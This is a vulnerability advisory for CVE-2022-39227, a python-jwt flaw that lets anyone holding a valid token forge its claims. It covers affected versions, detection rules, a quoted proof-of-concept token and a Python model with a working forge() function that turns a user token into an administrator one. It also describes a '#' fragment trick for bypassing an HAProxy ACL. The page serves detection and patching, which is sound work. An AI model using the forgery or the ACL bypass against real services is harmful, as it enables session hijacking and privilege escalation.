CVE-2022-39227
published 2022-09-23

Priority: P2 (65)
Severity: critical, CVSS 3.1 base score 9.1
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
EPSS: 3.56% (87.9th percentile)
python-jwt is a module for generating and verifying JSON Web Tokens. Versions prior to 3.3.4 are subject to Authentication Bypass by Spoofing, resulting in identity spoofing, session hijacking or authentication bypass. An attacker who obtains a JWT can arbitrarily forge its contents without knowing the secret key. Depending on the application, this may for example enable the attacker to spoof other users' identities, hijack their sessions, or bypass authentication. Users should upgrade to version 3.3.4. There are no known workarounds.

Affected

8 ranges

Vendor              Product                                        Version range                                                                            Fixed in
davedoesdev         python-jwt                                     < 3.3.4                                                                                  3.3.4
msrc                azl3_python-jwt_2.8.0-2_on_azure_linux_3.0
msrc                cbl2_python-jwt_2.4.0-2_on_cbl_mariner_2.0
msrc                cm1_python-jwt_2.4.0-2_on_cbl_mariner_1.0
python-jwt_project  python-jwt                                     >= 0 < 3.3.4                                                                             3.3.4
python-jwt_project  python-jwt                                     >= 3.0.0 < 3.3.4                                                                         3.3.4
python-jwt_project  python-jwt                                     >= 3.0.0 < 3.3.4                                                                         3.3.4
python-jwt_project  python-jwt                                     >= f6d1451012c6a04c2fb1940f0bbd93bb6cf2b025 < 88ad9e67c53aa5f7c43ec4aa52ed34b7930068c9  88ad9e67c53aa5f7c43ec4aa52ed34b7930068c9

Detection & IOCs (extracted from sources)

Proof-of-concept token construction (Python expression, as quoted from the source):

  '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'

Resulting request header (PS256 header shown; the placeholders stand for the original and tampered base64url segments):

  Authorization: {" eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.<tampered_payload>.":"","protected":"eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9", "payload":"<original_payload>","signature":"<original_signature>"}

  • Detect CVE-2022-39227 exploit attempts by inspecting the Authorization header for a JWT-like value that begins with '{' (a JSON object rather than a dot-separated string); that JSON wrapping is the hallmark of the forged token structure used in this attack.
  • Detect the HAProxy ACL bypass (CVE-2023-45539, chained with CVE-2022-39227 in the source) by monitoring HTTP requests to protected endpoints whose URI path contains a '#' fragment character, e.g. GET /api/v1/get_ticket#.
  • Detect JWT claim tampering by alerting on tokens whose payload carries a 'role' claim set to 'administrator' while the token is a JSON object with 'protected', 'payload' and 'signature' keys instead of a standard dot-separated JWT string.
  • The forged token keeps the original protected header and signature, so the signature check over the JSON object's 'protected' and 'payload' members still passes, and smuggles the tampered base64url payload into the extra dotted key; flag Authorization values matching this pattern: a JSON object with keys 'protected', 'payload' and 'signature' whose first key is a dot-separated JWT-like string.
  • Flag python-jwt versions prior to 3.3.4 in software inventory as vulnerable: the library lets an attacker who holds any valid JWT forge arbitrary contents without the secret key.
  • The HAProxy ACL blocking /api/v1/get_ticket is bypassable via the '#' fragment; to be effective, the ACL rule must also match URI variants that carry fragment characters.
  • python-jwt 3.3.3 (and every earlier version) is vulnerable; upgrading to 3.3.4 is the only remediation, as there are no known workarounds.
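The forgery above and the detection bullets, worked through end to end as an added example. This is a stdlib-only model written for this page, not python-jwt's or jwcrypto's code: it reproduces the bug class (signature verified on the JWS JSON serialization, claims re-read by splitting the raw token on '.'), shows the hardened check beside it, and runs the detection logic over constructed log lines. HS256 stands in for the PS256 of the captured header so no key generation is needed; SECRET, the claims, the log-line format and the function names are all assumptions of the example.

```python
"""Stdlib model of CVE-2022-39227, added for this page (not python-jwt's or
jwcrypto's code): the signature is checked on the JWS JSON serialization, but
the claims the app uses are re-read by splitting the raw token on '.', so a
forged payload smuggled into an extra JSON key wins. HS256 replaces the PS256
of the captured header; SECRET, the claims and the log lines are constructed."""
import base64
import hashlib
import hmac
import json
import re

SECRET = b"server-side-secret-the-attacker-never-learns"   # constructed

def b64url_encode(data):
    return base64.urlsafe_b64encode(data).decode().rstrip("=")

def b64url_decode(segment):
    # Lenient decoder in the style of the vulnerable path: pad by length mod 4 and
    # let urlsafe_b64decode drop non-alphabet characters, so a leading '{" ' vanishes.
    size = len(segment) % 4
    if size == 1:
        raise ValueError("invalid base64url length")
    return base64.urlsafe_b64decode(segment + "=" * ((4 - size) % 4))

def sign_hs256(claims):
    """Issue a compact JWT (what the server hands out after login)."""
    header = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(SECRET, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"

def _verified_parts(token):
    """Check the signature; accepts compact *and* JSON serialization, as the
    vulnerable library did. Returns (protected, payload) exactly as signed."""
    if token.lstrip().startswith("{"):
        obj = json.loads(token)
        header, payload, sig = obj["protected"], obj["payload"], obj["signature"]
    else:
        header, payload, sig = token.split(".")
    expected = hmac.new(SECRET, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        raise ValueError("bad signature")
    return header, payload

def verify_vulnerable(token):
    """Bug: the check passes on the JSON object, the claims come from a raw re-parse."""
    _verified_parts(token)
    header, claims, _ = token.split(".")
    json.loads(b64url_decode(header))          # '{" eyJ...' still decodes to the header
    return json.loads(b64url_decode(claims))   # ...and this is the attacker's payload

def verify_fixed(token):
    """Hardened: compact serialization only, claims taken from the signed payload."""
    if not re.fullmatch(r"[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+", token):
        raise ValueError("only compact JWS serialization is accepted")
    _header, payload = _verified_parts(token)
    return json.loads(b64url_decode(payload))

def forge(token, new_claims):
    """Attacker side: the page's PoC shape built from a captured token, no key needed.
    '{" ' is three characters, so the first '.'-split segment (3 + 36 chars for a
    27-byte header) has a length the lenient padding logic accepts."""
    header, payload, sig = token.split(".")
    fake = b64url_encode(json.dumps(new_claims, separators=(",", ":")).encode())
    return ('{" ' + header + "." + fake + '.":"",' + '"protected":"' + header +
            '", "payload":"' + payload + '","signature":"' + sig + '"}')

JSON_JWS_KEYS = ("protected", "payload", "signature")

def flag_request(log_line):
    """Detection over one constructed log line '<method> <uri> authorization=<value>';
    returns the reasons it was flagged (empty for a clean request)."""
    _method, uri, rest = log_line.split(" ", 2)
    value = rest.split("=", 1)[1]
    reasons = []
    if value.lstrip().startswith("{"):                 # JSON object, not a dotted string
        try:
            obj = json.loads(value)
        except ValueError:
            obj = {}
        if not isinstance(obj, dict):
            obj = {}
        if all(k in obj for k in JSON_JWS_KEYS):
            reasons.append("JSON-serialized JWS in Authorization header")
        if any("." in k for k in obj):
            reasons.append("dotted JWT-like key smuggled into the JSON object")
    if "#" in uri:
        reasons.append("fragment character in request path (ACL bypass pattern)")
    return reasons

def demo():
    genuine = sign_hs256({"sub": "alice", "role": "user"})
    forged = forge(genuine, {"sub": "alice", "role": "administrator"})
    try:
        fixed = verify_fixed(forged)
    except ValueError as exc:
        fixed = str(exc)
    return {
        "vulnerable_role": verify_vulnerable(forged)["role"],   # 'administrator'
        "fixed": fixed,                                         # rejected
        "forged_flags": flag_request("GET /api/v1/get_ticket# authorization=" + forged),
        "genuine_flags": flag_request("GET /api/v1/get_ticket authorization=" + genuine),
    }
```

Two details of the PoC fall out of the model: the attacker never touches the original 'protected', 'payload' or 'signature' members (that is what keeps the signature check green), and the '{" ' prefix is exactly three characters because a lenient base64url decoder that pads by length mod 4 rejects a segment whose length is 1 mod 4 but happily discards the three non-alphabet characters otherwise. The detector keys on structure (a JSON object in a place that should hold a dotted string, plus a dotted key inside it) rather than on any specific claim value, so it also catches forgeries that do not set role=administrator.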

CVSS provenance

Source          Score  Severity  Vector
nvd (v3.1)      9.1    CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
vendor_msrc     9.1    CRITICAL
vendor_redhat   9.1    CRITICAL